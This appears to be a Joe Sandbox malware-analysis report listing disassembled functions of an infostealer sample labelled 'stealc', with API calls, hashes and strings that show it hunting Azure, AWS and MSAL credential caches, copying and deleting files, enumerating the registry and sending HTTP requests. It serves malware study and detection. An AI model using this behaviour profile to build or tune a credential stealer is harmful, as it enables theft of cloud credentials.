Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zax
API String ID: 4017274736-1448909124
Opcode ID: d02c0da8a176dc487a2b5e0c94380778d0140e437c415657ed9123f62e94722a
Instruction ID: 2e18459699c4a8f08194611f825bfb5750b6facbd05019306a748765ccbc6486
Opcode Fuzzy Hash: d02c0da8a176dc487a2b5e0c94380778d0140e437c415657ed9123f62e94722a
Instruction Fuzzy Hash: 544195B5980204A7DB54F770ED4BFDD3738AB14700F404594B649660C1FEBD9BD98B92

Function 0077CEF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0077D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0077D0CE
lstrcatA.KERNEL32(?,00000000,00CFD8C8,00791474,00CFD8C8,00791470,00000000), ref: 0077D208
lstrcatA.KERNEL32(?,00791478), ref: 0077D217
lstrcatA.KERNEL32(?,00000000), ref: 0077D22A
lstrcatA.KERNEL32(?,0079147C), ref: 0077D239
lstrcatA.KERNEL32(?,00000000), ref: 0077D24C
lstrcatA.KERNEL32(?,00791480), ref: 0077D25B
lstrcatA.KERNEL32(?,00000000), ref: 0077D26E
lstrcatA.KERNEL32(?,00791484), ref: 0077D27D
lstrcatA.KERNEL32(?,00000000), ref: 0077D290
lstrcatA.KERNEL32(?,00791488), ref: 0077D29F
lstrcatA.KERNEL32(?,00000000), ref: 0077D2B2
lstrcatA.KERNEL32(?,0079148C), ref: 0077D2C1
lstrcatA.KERNEL32(?,00000000), ref: 0077D2D4
lstrcatA.KERNEL32(?,00791490), ref: 0077D2E3

Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885

lstrlenA.KERNEL32(?), ref: 0077D32A
lstrlenA.KERNEL32(?), ref: 0077D339
memset.MSVCRT ref: 0077D388

Part of subcall function 0078AA70: StrCmpCA.SHLWAPI(00000000,00791470,0077D1A2,00791470,00000000), ref: 0078AA8F

DeleteFileA.KERNEL32(00000000), ref: 0077D3B4

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: ec4b1a0c52f5e69c4887ee43bcfe4f957ca75a5413e8a24fc53cd9d51d2ca653
Instruction ID: 1456ca2986b24ff9a4829f257d1a40a17929e057b6e3fc30bb4d3f73e53d5745
Opcode Fuzzy Hash: ec4b1a0c52f5e69c4887ee43bcfe4f957ca75a5413e8a24fc53cd9d51d2ca653
Instruction Fuzzy Hash: ADE10DB1954108FBDB09FBA0DD9AEEE7378AF14301F504169F106A60A1DE3DAE05DB72

Function 00774880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00774915
StrCmpCA.SHLWAPI(?,00CFD998), ref: 0077493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00774ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00790DDB,00000000,?,?,00000000,?,",00000000,?,00CFD908), ref: 00774DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00774E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00774E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00774E49
InternetCloseHandle.WININET(00000000), ref: 00774EAD
InternetCloseHandle.WININET(00000000), ref: 00774EC5
HttpOpenRequestA.WININET(00000000,00CFD988,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00774B15

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

InternetCloseHandle.WININET(00000000), ref: 00774ECF

Strings

", xrefs: 00774BF2
------, xrefs: 00774C69
------, xrefs: 007749BD
", xrefs: 00774D33
------, xrefs: 00774B28

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: c9ea82500eb8518222e762d7aca16dc18be209dd64fffba995d713fb32a7ef26
Instruction ID: 57d219535df4cdd6d127884bfa4e52b003a05f81de2ad89ebbdb2b52031bd1f6
Opcode Fuzzy Hash: c9ea82500eb8518222e762d7aca16dc18be209dd64fffba995d713fb32a7ef26
Instruction Fuzzy Hash: 7B12AB71950118EAEB15FB90DD9AFEEB379AF14300F5041AAB10662491EF7C3F49CB62

Function 00788320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

RegOpenKeyExA.KERNEL32(00000000,00CFDBC0,00000000,00020019,00000000,007905B6), ref: 007883A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00788426
wsprintfA.USER32 ref: 00788459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0078847B
RegCloseKey.ADVAPI32(00000000), ref: 0078848C
RegCloseKey.ADVAPI32(00000000), ref: 00788499

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Strings

%s\%s, xrefs: 0078844D
- , xrefs: 007885A3
?, xrefs: 0078837A

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: f09a53b43af3c126e9b837f64f32af9b8453a6094e4b9c2ec45b2dd6b76ae828
Instruction ID: 61aca7a25780751237075f3b0cd5fc2294bad9fb78b6daaddb68ebb4c2bf6693
Opcode Fuzzy Hash: f09a53b43af3c126e9b837f64f32af9b8453a6094e4b9c2ec45b2dd6b76ae828
Instruction Fuzzy Hash: E2812EB1954118EBEB24EB50CD95FEAB7B8FF08710F4082D9E109A6140DF796B85CFA1

Function 00776280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

InternetOpenA.WININET(00790DFE,00000001,00000000,00000000,00000000), ref: 007762E1
StrCmpCA.SHLWAPI(?,00CFD998), ref: 00776303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00776335
HttpOpenRequestA.WININET(00000000,GET,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00776385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007763BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007763D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007763FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0077646D
InternetCloseHandle.WININET(00000000), ref: 007764EF
InternetCloseHandle.WININET(00000000), ref: 007764F9
InternetCloseHandle.WININET(00000000), ref: 00776503

Strings

ERROR, xrefs: 00776407
ERROR, xrefs: 007764C9
GET, xrefs: 0077637C

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: bf67aafd48645b68f778c65cd954332b7445c0f24d01e397d1802aed6951052c
Instruction ID: 3600309f3b60d16f3aaf24ffe660d0cc02eb260d070ca4e22ca6be17c93013ae
Opcode Fuzzy Hash: bf67aafd48645b68f778c65cd954332b7445c0f24d01e397d1802aed6951052c
Instruction Fuzzy Hash: B2715F71A50218EBEF24EFA0DC49BEE77B8FB44700F108199F1096B194DBB86A85DF51

Function 00785510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00785644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007856A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785857

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785228

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 007852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00785318
Part of subcall function 007852C0: lstrlenA.KERNEL32(00000000), ref: 0078532F
Part of subcall function 007852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00785364
Part of subcall function 007852C0: lstrlenA.KERNEL32(00000000), ref: 00785383
Part of subcall function 007852C0: strtok.MSVCRT(00000000,?), ref: 0078539E
Part of subcall function 007852C0: lstrlenA.KERNEL32(00000000), ref: 007853AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0078578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00785940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785A0C
Sleep.KERNEL32(0000EA60), ref: 00785A1B

Strings

ERROR, xrefs: 00785636
ERROR, xrefs: 00785932
ERROR, xrefs: 00785849
ERROR, xrefs: 007859FE
ERROR, xrefs: 0078577D
ERROR, xrefs: 00785693

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: cf5effa7f67f657a7602aed6f6e8a43843c9fb8d76b9ed5750ec2247f476b65b
Instruction ID: 2c988a64109b48f3473e0d542b6b2011341702700bcee9339282ccfea9d96179
Opcode Fuzzy Hash: cf5effa7f67f657a7602aed6f6e8a43843c9fb8d76b9ed5750ec2247f476b65b
Instruction Fuzzy Hash: 5AE13F71950108EADB19FBB0DD9AEFD7378AF54300F908129B50666191EF3C6F09DBA2

Function 00771310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00771327

Part of subcall function 007712A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007712B4
Part of subcall function 007712A0: HeapAlloc.KERNEL32(00000000), ref: 007712BB
Part of subcall function 007712A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 007712D7
Part of subcall function 007712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007712F5
Part of subcall function 007712A0: RegCloseKey.ADVAPI32(?), ref: 007712FF

lstrcatA.KERNEL32(?,00000000), ref: 0077134F
lstrlenA.KERNEL32(?), ref: 0077135C
lstrcatA.KERNEL32(?,.keys), ref: 00771377

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00771465

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A

